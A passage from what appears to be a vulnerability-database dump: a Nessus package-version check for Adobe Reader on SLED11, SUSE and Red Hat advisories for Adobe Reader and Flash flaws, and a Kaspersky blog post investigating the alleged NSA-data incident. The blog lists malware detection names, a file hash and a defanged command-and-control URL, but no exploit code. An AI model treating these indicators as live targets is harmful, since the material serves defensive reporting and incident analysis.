reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:08:46", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Acrobat Reader was updated to version 9.3.3 to fix lots of security issues and bugs, several of whom could be used to execute code by trick the target user to open specially crafted PDFs.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-07-08T11:59:38", "published": "2010-07-08T11:59:38", "id": "SUSE-SA:2010:029", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00004.html", "type": "suse", "title": "remote code execution in acroread", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "Adobe Flash Player was updated to fix multiple critical security vulnerabilities which allow an attacker to remotely execute arbitrary code or to cause a denial of service.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-06-11T17:44:20", "published": "2010-06-11T17:44:20", "id": "SUSE-SA:2010:024", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00000.html", "type": "suse", "title": "remote code execution in flash-player", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1240", "CVE-2010-1285", "CVE-2010-1295", "CVE-2010-1297", "CVE-2010-2168", "CVE-2010-2201", "CVE-2010-2202", "CVE-2010-2203", "CVE-2010-2204", "CVE-2010-2205", "CVE-2010-2206", "CVE-2010-2207", "CVE-2010-2208", "CVE-2010-2209", "CVE-2010-2210", "CVE-2010-2211", "CVE-2010-2212"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-15, listed in the References section. A specially-crafted PDF file\ncould cause Adobe Reader to crash or, potentially, execute arbitrary code\nas the user running Adobe Reader when opened. (CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-1297, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205, CVE-2010-2206,\nCVE-2010-2207, CVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211,\nCVE-2010-2212)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 9.3.3, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2017-09-08T12:06:51", "published": "2010-06-30T04:00:00", "id": "RHSA-2010:0503", "href": "https://access.redhat.com/errata/RHSA-2010:0503", "type": "redhat", "title": "(RHSA-2010:0503) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:12", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164", "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2172", "CVE-2010-2173", "CVE-2010-2174", "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2178", "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181", "CVE-2010-2182", "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185", "CVE-2010-2186", "CVE-2010-2187", "CVE-2010-2188"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-14,\nlisted in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2009-3793,\nCVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, \nCVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, \nCVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, \nCVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2181, \nCVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, \nCVE-2010-2187, CVE-2010-2188)\n\nAn input sanitization flaw was found in the way flash-plugin processed\ncertain URLs. An attacker could use this flaw to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a\nspecially-crafted web page. (CVE-2010-2179)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 9.0.277.0.\n", "modified": "2017-07-27T23:10:20", "published": "2010-06-14T04:00:00", "id": "RHSA-2010:0470", "href": "https://access.redhat.com/errata/RHSA-2010:0470", "type": "redhat", "title": "(RHSA-2010:0470) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164", "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2173", "CVE-2010-2174", "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2178", "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181", "CVE-2010-2182", "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185", "CVE-2010-2186", "CVE-2010-2187", "CVE-2010-2188"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-14, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2009-3793,\nCVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163,\nCVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169,\nCVE-2010-2170, CVE-2010-2171, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175,\nCVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2181,\nCVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186,\nCVE-2010-2187, CVE-2010-2188)\n\nAn input sanitization flaw was found in the way flash-plugin processed\ncertain URLs. An attacker could use this flaw to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a\nspecially-crafted web page. (CVE-2010-2179)\n\nA denial of service flaw was found in the way flash-plugin processed\ncertain SWF content. An attacker could use this flaw to create a\nspecially-crafted SWF file that would cause flash-plugin to crash.\n(CVE-2008-4546)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.1.53.64.\n", "modified": "2017-07-27T07:33:10", "published": "2010-06-11T04:00:00", "id": "RHSA-2010:0464", "href": "https://access.redhat.com/errata/RHSA-2010:0464", "type": "redhat", "title": "(RHSA-2010:0464) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2017-11-27T08:03:02", "bulletinFamily": "blog", "cvelist": ["CVE-2009-3869", "CVE-2010-0094", "CVE-2010-0188", "CVE-2010-0480", "CVE-2010-0840", "CVE-2010-0842", "CVE-2010-1297", "CVE-2010-3563", "CVE-2010-3653", "CVE-2010-3654", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-3400", "CVE-2011-3544", "CVE-2012-0507", "CVE-2012-0754", "CVE-2012-1723", "CVE-2012-4681", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-2171", "CVE-2013-2423"], "description": "\n\n## Background\n\nIn early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee's home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:\n\n 1. Was our software used outside of its intended functionality to pull classified information from a person's computer?\n 2. When did this incident occur?\n 3. Who was this person?\n 4. Was there actually classified information found on the system inadvertently?\n 5. If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n 6. Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n 7. What types of files were gathered from the supposed system?\n 8. Do we have any indication the user was subsequently \"hacked\" by Russian hackers and data exfiltrated?\n 9. Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n 10. Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?\n\nAnswering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as a food for thought to everyone else. To further support the objectivity of the internal investigation we ran our investigation using multiple analysts of non-Russian origin and working outside of Russia to avoid even potential accusations of influence.\n\n## The Wall Street Journal Article\n\nThe article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:\n\n * The information \"stolen\" provides details on how the U.S. penetrates foreign computer networks and defends against cyberattacks.\n * A National Security Agency contractor removed the highly classified material and put it on his home computer.\n * The data ended up in the hands of so called \"Russian hackers\" after the files were detected using Kaspersky Lab software.\n * The incident occurred in 2015 but wasn't discovered until spring of last year [2016].\n * The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.\n * \"Hackers\" homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.\n\n## Beginning of Search\n\nHaving all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.\n\nThe first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including \"Equestre\", \"Equation\", \"Grayfish\", \"Fanny\", \"DoubleFantasy\" given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as \"HEUR:Trojan.Win32.Equestre.*\". Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don't have all the details.\n\nBelow is a list of all hits in September for an \"Equestre\" signature, sorted by least amount to most. You can quickly identify the problem signature(s) mentioned above.\n\nDetection name (silent) | Count \n---|--- \nHEUR:Trojan.Win32.Equestre.u | 1 \nHEUR:Trojan.Win32.Equestre.gen.422674 | 3 \nHEUR:Trojan.Win32.Equestre.gen.422683 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427692 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427696 | 4 \nHEUR:Trojan.Win32.Equestre.gen.446160 | 6 \nHEUR:Trojan.Win32.Equestre.gen.446979 | 7 \nHEUR:Trojan.Win32.Equestre.g | 8 \nHEUR:Trojan.Win32.Equestre.ab | 9 \nHEUR:Trojan.Win32.Equestre.y | 9 \nHEUR:Trojan.Win32.Equestre.l | 9 \nHEUR:Trojan.Win32.Equestre.ad | 9 \nHEUR:Trojan.Win32.Equestre.t | 9 \nHEUR:Trojan.Win32.Equestre.e | 10 \nHEUR:Trojan.Win32.Equestre.v | 14 \nHEUR:Trojan.Win32.Equestre.gen.427697 | 18 \nHEUR:Trojan.Win32.Equestre.gen.424814 | 18 \nHEUR:Trojan.Win32.Equestre.s | 19 \nHEUR:Trojan.Win32.Equestre.x | 20 \nHEUR:Trojan.Win32.Equestre.i | 24 \nHEUR:Trojan.Win32.Equestre.p | 24 \nHEUR:Trojan.Win32.Equestre.q | 24 \nHEUR:Trojan.Win32.Equestre.gen.446142 | 34 \nHEUR:Trojan.Win32.Equestre.d | 39 \nHEUR:Trojan.Win32.Equestre.j | 40 \nHEUR:Trojan.Win32.Equestre.gen.427734 | 53 \nHEUR:Trojan.Win32.Equestre.gen.446149 | 66 \nHEUR:Trojan.Win32.Equestre.ag | 142 \nHEUR:Trojan.Win32.Equestre.b | 145 \nHEUR:Trojan.Win32.Equestre.h | 310 \nHEUR:Trojan.Win32.Equestre.gen.422682 | 737 \nHEUR:Trojan.Win32.Equestre.z | 1389 \nHEUR:Trojan.Win32.Equestre.af | 2733 \nHEUR:Trojan.Win32.Equestre.c | 3792 \nHEUR:Trojan.Win32.Equestre.m | 4061 \nHEUR:Trojan.Win32.Equestre.k | 6720 \nHEUR:Trojan.Win32.Equestre.exvf.1 | 6726 \nHEUR:Trojan.Win32.Equestre.w | 6742 \nHEUR:Trojan.Win32.Equestre.f | 9494 \nHEUR:Trojan.Win32.Equestre.gen.446131 | 26329 \nHEUR:Trojan.Win32.Equestre.aa | 87527 \nHEUR:Trojan.Win32.Equestre.gen.447002 | 547349 \nHEUR:Trojan.Win32.Equestre.gen.447013 | 1472919 \n \nTaking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature \"HEUR:Trojan.Win32.Equestre.m\" and a 7zip archive (referred below as \"[undisclosed].7z\"). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:\n\nHEUR:Trojan.Win32.Equestre.e \nHEUR:Trojan.Win32.Equestre.exvf.1 \nHEUR:Trojan.Win32.Equestre.g \nHEUR:Trojan.Win32.Equestre.gen.424814 \nHEUR:Trojan.Win32.Equestre.gen.427693 \nHEUR:Trojan.Win32.Equestre.gen.427696 \nHEUR:Trojan.Win32.Equestre.gen.427697 \nHEUR:Trojan.Win32.Equestre.gen.427734 \nHEUR:Trojan.Win32.Equestre.gen.446142 \nHEUR:Trojan.Win32.Equestre.gen.446993 \nHEUR:Trojan.Win32.Equestre.gen.465795 \nHEUR:Trojan.Win32.Equestre.i \nHEUR:Trojan.Win32.Equestre.j \nHEUR:Trojan.Win32.Equestre.m \nHEUR:Trojan.Win32.Equestre.p \nHEUR:Trojan.Win32.Equestre.q \nHEUR:Trojan.Win32.Equestre.x \nHEUR:Trojan.Win32.GrayFish.e \nHEUR:Trojan.Win32.GrayFish.f\n\nIn total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users' privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company's reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.\n\nThe file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. At this point in time, we felt confident we had found the source of the story fed to Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.\n\nOur next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.\n\nUpon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named \"[undisclosed].7z\" was removed from storage. Based on description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold; We don't need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not consumed even to produce detection signatures based on descriptions.\n\nThis concern was later translated into a policy for all malware analysts which are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively \"detected on\" during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).\n\n## An Interesting Twist\n\nDuring the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the \"setup.exe\" file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 - for [detection coverage, see this VirusTotal link](<https://www.virustotal.com/#/file/6bcd591540dce8e0cef7b2dc6a378a10d79f94c3217bca5f05db3c24c2036340/detection>)) .\n\nLooking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of \"Office-2013-PPVL-x64-en-US-Oct2013.iso\". What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as \"kms.exe\" (a name of a popular pirated software activation tool), and \"kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions\". Kaspersky Lab products detected the malware with the verdict **Backdoor.Win32.Mokes.hvl**.\n\nAt a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL \"http://xvidmovies[.]in/dir/index.php\". Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It's important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.\n\nTo install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. **Executing the malware would not have been possible with the antivirus enabled**.\n\nAdditionally, there also may have been other malware from different downloads that we were unaware of during this time frame. Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:\n\nBackdoor.OSX.Getshell.k \nBackdoor.Win32.Mokes.hvl \nBackdoor.Win32.Shiz.gpmv \nBackdoor.Win32.Swrort.dbq \nDangerousObject.Multi.Chupitio.a \nExploit.Java.Agent.f \nExploit.Java.CVE-2009-3869.a \nExploit.Java.CVE-2010-0094.bb \nExploit.Java.CVE-2010-0094.e \nExploit.Java.CVE-2010-0094.q \nExploit.Java.CVE-2010-0840.gm \nExploit.Java.CVE-2010-0842.d \nExploit.Java.CVE-2010-3563.a \nExploit.Java.CVE-2011-3544.ac \nExploit.Java.CVE-2012-0507.al \nExploit.Java.CVE-2012-0507.je \nExploit.Java.CVE-2012-1723.ad \nExploit.Java.CVE-2012-4681.l \nExploit.JS.Aurora.a \nExploit.MSVisio.CVE-2011-3400.a \nExploit.Multi.CVE-2012-0754.a \nExploit.OSX.Smid.b \nExploit.SWF.CVE-2010-1297.c \nExploit.SWF.CVE-2011-0609.c \nExploit.SWF.CVE-2011-0611.ae \nExploit.SWF.CVE-2011-0611.cd \nExploit.Win32.CVE-2010-0188.a \nExploit.Win32.CVE-2010-0480.a \nExploit.Win32.CVE-2010-3653.a \nExploit.Win32.CVE-2010-3654.a \nHackTool.Win32.Agent.vhs \nHackTool.Win32.PWDump.a \nHackTool.Win32.WinCred.e \nHackTool.Win32.WinCred.i \nHackTool.Win64.Agent.b \nHackTool.Win64.WinCred.a \nHackTool.Win64.WinCred.c \nHEUR:Exploit.FreeBSD.CVE-2013-2171.a \nHEUR:Exploit.Java.CVE-2012-1723.gen \nHEUR:Exploit.Java.CVE-2013-0422.gen \nHEUR:Exploit.Java.CVE-2013-0431.gen \nHEUR:Exploit.Java.CVE-2013-2423.gen \nHEUR:Exploit.Java.Generic \nHEUR:Exploit.Script.Generic \nHEUR:HackTool.AndroidOS.Revtcp.a \nHEUR:Trojan-Downloader.Script.Generic \nHEUR:Trojan-FakeAV.Win32.Onescan.gen \nHEUR:Trojan.Java.Generic \nHEUR:Trojan.Script.Generic \nHEUR:Trojan.Win32.Generic \nHoax.Win32.ArchSMS.cbzph \nKHSE:Exploit.PDF.Generic.a \nnot-a-virus:AdWare.JS.MultiPlug.z \nnot-a-virus:AdWare.NSIS.Agent.bx \nnot-a-virus:AdWare.Win32.Agent.allm \nnot-a-virus:AdWare.Win32.AirAdInstaller.cdgd \nnot-a-virus:AdWare.Win32.AirAdInstaller.emlr \nnot-a-virus:AdWare.Win32.Amonetize.fay \nnot-a-virus:AdWare.Win32.DomaIQ.cjw \nnot-a-virus:AdWare.Win32.Fiseria.t \nnot-a-virus:AdWare.Win32.iBryte.jda \nnot-a-virus:AdWare.Win32.Inffinity.yas \nnot-a-virus:AdWare.Win32.MultiPlug.nbjr \nnot-a-virus:AdWare.Win32.Shopper.adw \nnot-a-virus:Downloader.NSIS.Agent.am \nnot-a-virus:Downloader.NSIS.Agent.an \nnot-a-virus:Downloader.NSIS.Agent.as \nnot-a-virus:Downloader.NSIS.Agent.go \nnot-a-virus:Downloader.NSIS.Agent.lf \nnot-a-virus:Downloader.NSIS.OutBrowse.a \nnot-a-virus:Downloader.Win32.Agent.bxib \nnot-a-virus:Monitor.Win32.Hooker.br \nnot-a-virus:Monitor.Win32.KeyLogger.xh \nnot-a-virus:PSWTool.Win32.Cain.bp \nnot-a-virus:PSWTool.Win32.Cain.bq \nnot-a-virus:PSWTool.Win32.CredDump.a \nnot-a-virus:PSWTool.Win32.FirePass.ia \nnot-a-virus:PSWTool.Win32.NetPass.amv \nnot-a-virus:PSWTool.Win32.PWDump.3 \nnot-a-virus:PSWTool.Win32.PWDump.4 \nnot-a-virus:PSWTool.Win32.PWDump.5 \nnot-a-virus:PSWTool.Win32.PWDump.ar \nnot-a-virus:PSWTool.Win32.PWDump.at \nnot-a-virus:PSWTool.Win32.PWDump.bey \nnot-a-virus:PSWTool.Win32.PWDump.bkr \nnot-a-virus:PSWTool.Win32.PWDump.bve \nnot-a-virus:PSWTool.Win32.PWDump.f \nnot-a-virus:PSWTool.Win32.PWDump.sa \nnot-a-virus:PSWTool.Win32.PWDump.yx \nnot-a-virus:RiskTool.Win32.WinCred.gen \nnot-a-virus:RiskTool.Win64.WinCred.a \nnot-a-virus:WebToolbar.JS.Condonit.a \nnot-a-virus:WebToolbar.Win32.Agent.avl \nnot-a-virus:WebToolbar.Win32.Cossder.updv \nnot-a-virus:WebToolbar.Win32.Cossder.uubg \nnot-a-virus:WebToolbar.Win32.MyWebSearch.sv \nPDM:Trojan.Win32.Badur.a \nTrojan-Banker.Win32.Agent.kan \nTrojan-Downloader.Win32.Genome.jlcv \nTrojan-Dropper.Win32.Injector.jqmj \nTrojan-Dropper.Win32.Injector.ktep \nTrojan-FakeAV.Win64.Agent.j \nTrojan-Ransom.Win32.ZedoPoo.phd \nTrojan.Java.Agent.at \nTrojan.Win32.Adond.lbgp \nTrojan.Win32.Buzus.umzt \nTrojan.Win32.Buzus.uuzf \nTrojan.Win32.Diple.fygv \nTrojan.Win32.Genome.amqoa \nTrojan.Win32.Genome.amtor \nTrojan.Win32.Genome.kpzv \nTrojan.Win32.Genome.ngd \nTrojan.Win32.Inject.euxi \nTrojan.Win32.Starter.ceg \nTrojan.Win32.Swisyn.aaig \nUDS:DangerousObject.Multi.Generic \nUFO:(blocked) \nVirTool.Win32.Rootkit \nVirTool.Win32.Topo.12 \nVirus.Win32.Suspic.gen \nWMUF:(blocked)\n\n## Conclusions\n\nAt this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:\n\n**Q1** - Was our software used outside of its intended functionality to pull classified information from a person's computer?\n\n**A1** - The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.\n\n**Q2** - When did this incident occur?\n\n**A2** - In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.\n\n**Q3** - Who was this person?\n\n**A3** - Because our software anonymizes certain aspects of users' information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.\n\n**Q4** - Was there actually classified information found on the system inadvertently?\n\n**A4** - What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on an Equation specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.\n\n**Q5** - If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n\n**A5** - After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. \u2013 statistics and some metadata). We cannot assess whether the data was \"handled appropriately\" (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.\n\n**Q6 \u2013 **Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n\n**A6 - **The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.\n\n**Q7** - What types of files were gathered from the supposed system?\n\n**A7** - Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.\n\n**Q8** - Do we have any indication the user was subsequently \"hacked\" by Russian actors and data exfiltrated?\n\n**A8** - Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. We asses this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as \"Smoke Bot\" or \"Smoke Loader\") allegedly created by a Russian hacker in 2011 and made available on [Russian underground forums](<http://xaker.name/threads/22008/>) for purchase. During the period of September 2014-November 2014, the command and control servers of 